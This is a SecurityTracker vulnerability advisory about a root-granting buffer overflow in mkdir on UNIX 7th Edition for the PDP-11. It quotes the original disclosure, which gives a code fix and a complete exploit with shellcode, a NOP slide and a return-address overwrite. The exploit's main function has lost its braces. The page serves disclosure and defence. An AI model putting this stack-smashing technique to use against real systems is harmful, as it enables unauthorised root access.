Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
UNIX 7th Edition mkdir Buffer Overflow Lets Local Users Gain Root Privileges
|
|
SecurityTracker Alert ID: 1010383
|
|
SecurityTracker URL: http://securitytracker.com/id?1010383
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 3 2004
|
Impact: Execution of arbitrary code via local system, User access via local system
|
Exploit Included: Yes
|
Description: A buffer overflow vulnerability was reported in the mkdir utility on UNIX 7th Edition systems. A local user can gain root access on the target system.
Tim Newsham reported that on UNIX 7th Edition systems, /bin/mkdir ('/usr/src/cmd/mkdir.c') copies a portion of the user-supplied
path into a fixed sized buffer when checking to see if the specified directory exists. A local user can reportedly provide a specially
named directory to execute arbitrary code on the target system. The code will run with root privileges, the report said.
PDP-11
systems are reportedly affected.
[Editor's note: 7th Edition UNIX is a rather old version of UNIX.]
|
Impact: A local user can execute arbitrary code with root privileges.
|
Solution: No solution was available at the time of this entry.
The author of the report has indicated that you can add the following code
to the beginning of the mkdir() function:
if(strlen(d) >= 126) {
fprintf(stderr, "mkdir: path is too long\n");
++Errors;
return;
}
|
Cause: Boundary error
|
Underlying OS: UNIX (Any)
|
Underlying OS Comments: UNIX 7th Edition; PDP-11
|
Reported By: Tim Newsham <newsham@lava.net>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 2 Jun 2004 17:30:50 -1000 (HST)
From: Tim Newsham <newsham@lava.net>
Subject: Mkdir buffer overflow vulnerability in Unix Seventh Edition.
|
Mkdir buffer overflow vulnerability in Unix Seventh Edition.
2 Jun 2004
SYNOPSIS
A vulnerability in the mkdir system utility can allow an
unprivileged user to gain root privileges in UNIX 7th
Edition systems.
DESCRIPTION
The mkdir utility (/bin/mkdir) creates directories on behalf
of the user. Mkdir is granted root privileges through the
set-user-id mechanism to allow it to create directories with
the mknod system call. Before making a subdirectory, mkdir first
verifies that the path leading up to the new directory exists
and that the user can access the directory. In the process
of performing these tests, mkdir copies a portion of the
user supplied path into a fixed sized temporary buffer.
This occurs in the function mkdir() (see /usr/src/cmd/mkdir.c).
The mkdir() function first finds the position of the last path
divider character ('/') in the provided path, and then copies
all the data up to this point into the pname buffer. Since
the pname buffer is only 128 bytes long, and the user provided
path can have a much longer length, a buffer overflow condition
exists.
SOLUTION
The fix to this problem is simple -- ensure that the provided
path is no longer than the maximum path length. This can be
done by adding:
if(strlen(d) >= 126) {
fprintf(stderr, "mkdir: path is too long\n");
++Errors;
return;
}
to the start of the mkdir() function. Comparing with a value
slightly less than the maximum path length ensures that the
buffer is also large enough to contain the path to the "."
link that is created later in the function.
EXPLOIT
The following program exploits this problem on the PDP-11
platform to run a shell with the effective user id of the
superuser.
----
/*
* Exploit for /bin/mkdir Unix V7 PDP-11.
* mkdir has a buffer overflow when checking if the directory
* in /arg/with/slashes/fname exists.
*
* This will run /bin/sh with euid 0, but not uid 0. Since
* the shell doesn't do anything special about this, we don't
* really care. If you care, run setuid(0); execl("/bin/sh", 0);
*/
/*
.globl _main
_main:
mov pc,r1
sub $-[sh-_main-2], r1 / pointer to sh
mov r1, r2
sub $-8, r2
clrb -1(r2) / null terminate
mov r1, r2
clr -(r1) / char *env[] = {0}
mov r1, r3
mov r2, -(r1) / char *argv[] = {sh, 0}
mov r1, r4
mov r3, -(r1) / reverse of sh,argv,env
mov r4, -(r1)
mov r2, -(r1)
sys 59.; 11111; 11111; 11111 / call execve
argv: 11111; 11111
sh: </bin/sh>
*/
char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
0102, 020, 041, 012, 0103, 020, 0241, 020,
0104, 020, 0341, 020, 041, 021, 0241, 020,
073, 0211, 0111, 022, 0111, 022, 0111, 022,
0111, 022, 0111, 022, 057, 0142, 0151, 0156,
057, 0163, 0150, 0 };
#define NOPSLIDE 50
#define CNT 136
#define PC 0xfea0
main(argc, argv)
int argc;
char **argv;
char buf[400];
int i;
char *argv2[4];
/* nop slide + egg */
for(i = 0; i < NOPSLIDE; ) {
buf[i++] = 0301;
buf[i++] = 021;
}
strcpy(buf + i, egg);
/* pad out to CNT */
for(i = strlen(buf); i < CNT; i++)
buf[i] = 'a';
/* overwrite retaddr */
buf[i++] = PC & 0xff;
buf[i++] = PC >> 8;
/* extra stuff */
buf[i++] = '/';
buf[i++] = 'a';
buf[i++] = 0;
argv2[0] = "/bin/mkdir";
argv2[1] = buf;
argv2[2] = 0;
execv(argv2[0], argv2);
return 0;
|
|
Go to the Top of This SecurityTracker Archive Page
|
